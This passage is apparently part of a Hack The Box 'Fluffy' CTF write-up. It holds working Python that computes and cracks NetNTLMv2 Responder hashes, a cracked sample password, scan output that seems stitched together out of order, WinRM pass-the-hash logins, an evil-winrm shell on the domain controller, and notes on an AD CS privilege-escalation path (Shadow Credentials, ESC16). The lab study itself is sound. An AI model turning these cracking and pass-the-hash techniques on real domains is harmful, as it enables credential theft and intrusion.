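        for fn, k, order, shifts in rounds:
            for i, idx in enumerate(order):
                a = rotl((a + fn(b, c, d) + x[idx] + k) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c
        h = [(v + w) & mask for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))  # NTOWFv1: MD4 of the UTF-16LE password


def nt_proof_str(password, user, domain, server_challenge, blob) -> bytes:
    # NTOWFv2 = HMAC-MD5(NT hash, UPPER(user) + domain); NTProofStr = HMAC-MD5(NTOWFv2, challenge + blob)
    key = hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16le"), md5).digest()
    return hmac.new(key, server_challenge + blob, md5).digest()


AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 9: "TargetName"}  # MS-NLMP AvId values


def av_pair(av_id: int, value: str) -> bytes:
    enc = value.encode("utf-16le")
    return struct.pack("<HH", av_id, len(enc)) + enc


def build_blob(timestamp: int, client_challenge: bytes, av_pairs: bytes) -> bytes:
    # NTLMv2_CLIENT_CHALLENGE: RespType 1, HiRespType 1, Reserved1/2, TimeStamp, client nonce,
    # Reserved3, AvPairs terminated by MsvAvEOL, then 4 trailing reserved bytes
    return (b"\x01\x01\x00\x00" + b"\x00" * 4 + struct.pack("<Q", timestamp) + client_challenge
            + b"\x00" * 4 + av_pairs + b"\x00" * 8)


def responder_line(user, domain, password, server_challenge, blob) -> str:
    proof = nt_proof_str(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex().upper()}:{blob.hex().upper()}"


def parse_line(line: str):
    user, _, domain, chal, proof, blob = line.split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def decode_av_pairs(blob: bytes) -> dict:
    """Walk the AvPairs after the 28-byte blob header. The name pairs are the ones the
    server (Responder) offered in its CHALLENGE, echoed back; TargetName is client-added."""
    pos, out = 28, {}
    while pos + 4 <= len(blob):
        av_id, av_len = struct.unpack_from("<HH", blob, pos)
        pos += 4
        if av_id == 0:
            break
        raw = blob[pos:pos + av_len]
        out[AV_NAMES.get(av_id, f"Av{av_id}")] = raw.decode("utf-16le") if av_id in AV_NAMES else raw.hex()
        pos += av_len
    return out


def crack(line: str, wordlist):
    """Same work as john's netntlmv2 format: recompute NTProofStr per candidate and compare."""
    user, domain, chal, proof, blob = parse_line(line)
    for cand in wordlist:
        if hmac.compare_digest(nt_proof_str(cand, user, domain, chal, blob), proof):
            return cand
    return None


# Constructed capture for FLUFFY\p.agila: random challenges, the timestamp taken from the page's
# blob (bytes 00A146F2B3D0DB01) and the password john recovered. Not the page's real capture.
SAMPLE = responder_line("p.agila", "FLUFFY", "prometheusx-303", os.urandom(8),
                        build_blob(0x01DBD0B3F246A100, os.urandom(8),
                                   av_pair(2, "FLUFFY") + av_pair(1, "DC01") + av_pair(9, "cifs/10.10.14.146")))

if __name__ == "__main__":
    print(SAMPLE)
    print(decode_av_pairs(parse_line(SAMPLE)[4]))
    print("cracked:", crack(SAMPLE, ["Summer2025!", "prometheusx-303"]))
```

Two practical consequences follow from the math: the domain and username fields of the capture are part of the keyed input, so a line must be cracked with them exactly as captured (which is why the wrapped Responder output above has to be rejoined into one line before feeding it to john), and because the blob is per-request the same password produces a different "hash" on every capture, so NetNTLMv2 lines cannot be compared to each other or looked up in a precomputed table.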
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# crackmapexec winrm 10.129.237.207 -u j.fleischamn -p 'J0elTHEM4n1990!'
SMB 10.129.237.207 5985 DC01 [*] Windows 10.0 Build 17763 (name:DC01) (domain:fluffy.htb)
HTTP 10.129.237.207 5985 DC01 [*] http://10.129.237.207:5985/wsman
WINRM 10.129.237.207 5985 DC01 [-] fluffy.htb\j.fleischamn:J0elTHEM4n1990!
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY/10.129.237.207]
└─# nxc winrm 10.129.237.207 -u winrm_svc -H '33bd09dcd697600edf6b3a7af4875767'
WINRM 10.129.237.207 5985 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb)
WINRM 10.129.237.207 5985 DC01 [+] fluffy.htb\winrm_svc:33bd09dcd697600edf6b3a7af4875767 (Pwn3d!)
┌──(root㉿kali)-[/home/kali/BOXES/FLUFFY]
└─# evil-winrm -i 10.129.237.207 -u winrm_svc -H 33bd09dcd697600edf6b3a7af4875767
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> hostname
DC01
USER-SHELL !
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> whoami
fluffy\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> hostname
DC01
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> dir
Directory: C:\Users\winrm_svc\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/29/2025 5:51 PM 34 user.txt
*Evil-WinRM* PS C:\Users\winrm_svc\Desktop> type user.txt
[REDACTED]
USER.TXT: [REDACTED]
PRIV ESC:
Shadow Credentials on ca_svc (GenericWrite via the Service Accounts group) to get its NT hash, then certipy find as ca_svc for AD CS enumeration, which turns up ESC16.
#Check the BLOODHOUND DATA and ESC16 Notes sections above.
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open unknown
49685/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49686/tcp open msrpc Microsoft Windows RPC
49688/tcp open unknown
49698/tcp open msrpc Microsoft Windows RPC
49705/tcp open unknown
49730/tcp open unknown
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
https://seriotonctf.github.io/2024/06/26/ADCS-Attacks-with-Certipy/index.html
